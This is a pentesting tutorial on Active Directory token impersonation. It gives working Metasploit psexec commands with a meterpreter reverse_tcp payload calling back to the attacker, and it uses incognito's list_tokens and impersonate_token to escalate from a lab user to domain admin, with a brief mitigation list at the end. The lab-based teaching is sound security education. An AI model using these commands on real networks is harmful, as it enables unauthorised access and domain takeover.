Attacks - Active Directory Hacking

Token Impersonation

What are Tokens?

Tokens are pieces of information that allow a user to access a system or resource. They are used to authenticate users and grant them access to resources.

What is Token Impersonation?

Token Impersonation is a technique where an attacker uses a compromised token to impersonate a user and gain access to resources.

Types of Tokens

Delegate

TL;DR Created on login or for logging into a remote system (RDP).

A delegate token is a token that is used to authenticate a user to a remote resource. It is typically used for remote access (RDP) to a system.

Impersonate

TL;DR “non-interactive” such as attaching a network drive or a domain logon script.

An impersonate token is a token that is used to impersonate a user. It is typically used to gain access to resources that the user would not normally have access to.

How it works?

  1. Attacker compromises a user’s account
  2. Attacker uses a tool like Mimikatz to extract the user’s token
  3. Attacker uses the token to impersonate the user
  4. Attacker gains access to resources the user would not normally have access to

Demo Time

Of course we should have a user with a password that we know.

Let’s do it with Metasploit:

msfconsole
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser user
set SMBDomain lab.local
set SMBPass password
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
exploit

then we’ll get a meterpreter session:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

then we will load the incognito module:

load incognito

to list all the tokens:

list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
LAB\xle0x

to impersonate a user:

impersonate_token "LAB\xle0x"

meterpreter > getuid
Server username: LAB\xle0x

if you want to revert back to SYSTEM:

rev2self

what if the domain admin is logged in?

list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
LAB\xle0x
LAB\Administrator

impersonate_token "LAB\Administrator"

meterpreter > getuid
Server username: LAB\Administrator

and we are now the domain admin!

Mitigation

  • Local admin restriction
  • Account tiering
  • Limit user/group token creation permissions